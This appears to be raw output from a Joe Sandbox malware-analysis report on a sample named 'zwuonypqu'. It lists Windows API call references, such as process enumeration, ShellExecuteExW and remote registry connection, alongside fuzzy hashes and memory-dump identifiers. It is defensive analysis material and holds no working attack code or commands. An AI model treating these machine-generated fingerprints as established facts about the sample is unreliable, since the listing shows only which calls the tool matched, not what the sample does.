                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ConnectRegistry_wcslen
                        • String ID:
                        • API String ID: 535477410-0
                        • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                        • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                        • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                        • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                        APIs
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                        • _memset.LIBCMT ref: 004538C4
                        • GetMenuItemInfoW.USER32 ref: 004538EF
                        • _wcslen.LIBCMT ref: 00453960
                        • SetMenuItemInfoW.USER32 ref: 004539C4
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004539E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                        • String ID: 0
                        • API String ID: 3530711334-4108050209
                        • Opcode ID: f8b7da67bd46f6d3acaa256ed113b1c9c09b209eebf999d73fbf05c6f83275f6
                        • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                        • Opcode Fuzzy Hash: f8b7da67bd46f6d3acaa256ed113b1c9c09b209eebf999d73fbf05c6f83275f6
                        • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                        APIs
                        • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                        • CloseHandle.KERNEL32(00000000), ref: 00473C01
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        • String ID: HH
                        • API String ID: 3488606520-2761332787
                        • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                        • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                        • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                        • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                        APIs
                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                        • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                        • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                        • LineTo.GDI32(?,?), ref: 004474BF
                        • CloseFigure.GDI32(?), ref: 004474C6
                        • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                        • Rectangle.GDI32(?,?), ref: 004474F3
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                        • String ID:
                        • API String ID: 4082120231-0
                        • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                        • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                        • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                        • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                        APIs
                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                        • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                        • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                        • LineTo.GDI32(?,?), ref: 004474BF
                        • CloseFigure.GDI32(?), ref: 004474C6
                        • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                        • Rectangle.GDI32(?,?), ref: 004474F3
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                        • String ID:
                        • API String ID: 4082120231-0
                        • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                        • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                        • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                        • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                        • String ID:
                        • API String ID: 288456094-0
                        • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                        • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                        • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                        • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                        • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                        • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                        • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                        • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                        • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                        • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                        • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                        • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                        • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ConnectRegistry_wcslen
                        • String ID: HH
                        • API String ID: 535477410-2761332787
                        • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                        • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                        • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                        • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                        APIs
                        • _memset.LIBCMT ref: 00457C34
                        • _memset.LIBCMT ref: 00457CE8
                        • ShellExecuteExW.SHELL32(?), ref: 00457D34
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                        • CloseHandle.KERNEL32(?), ref: 00457DDD
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                        • String ID: <$@
                        • API String ID: 1325244542-1426351568
                        • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                        • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                        • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                        • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0047379B
                        • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                        • __wsplitpath.LIBCMT ref: 004737E1
                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                        • _wcscat.LIBCMT ref: 004737F6
                        • __wcsicoll.LIBCMT ref: 00473818
                        • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                        • CloseHandle.KERNEL32(00000000), ref: 00473852
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                        • String ID:
                        • API String ID: 2547909840-0
                        • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                        • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                        • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                        • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                        APIs
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                        • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                        • DeleteObject.GDI32(?), ref: 0045564E
                        • DeleteObject.GDI32(?), ref: 0045565C
                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                        • DestroyWindow.USER32 ref: 00455678
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                        • String ID:
                        • API String ID: 2354583917-0
                        • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                        • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                        • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                        • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                        APIs
                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                        • GetMenu.USER32(?,?,?,00000001,?,?,?,?), ref: 004776AA
                        • GetMenuItemCount.USER32(00000000), ref: 004776CC
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                        • _wcslen.LIBCMT ref: 0047771A
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$CountItemStringWindow_wcslen
                        • String ID:
                        • API String ID: 1823500076-0
                        • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                        • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                        • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                        • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                        APIs
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                        • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                        • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Enable$Show$MessageMoveSend
                        • String ID:
                        • API String ID: 896007046-0
                        • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                        • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                        • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                        • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                        APIs
                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                        • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                        • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                        • SendMessageW.USER32(0243E158,000000F1,00000000,00000000), ref: 004414C6
                        • SendMessageW.USER32(0243E158,000000F1,00000001,00000000), ref: 004414F1
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                        • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                        • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                        • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                        • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                        • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                        • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                        APIs
                        • InterlockedIncrement.KERNEL32 ref: 0047247C
                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                        • Sleep.KERNEL32(0000000A), ref: 00472499
                        • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                        • InterlockedDecrement.KERNEL32(004A7CAC,?,?,?,?), ref: 00472599
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Interlocked$DecrementIncrement$Sleep
                        • String ID: 0vH
                        • API String ID: 327565842-3662162768
                        • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                        • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                        • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                        • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                        APIs
                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                        • GetFocus.USER32(?,00000401,?,00000000), ref: 00448B1C
                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                        • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
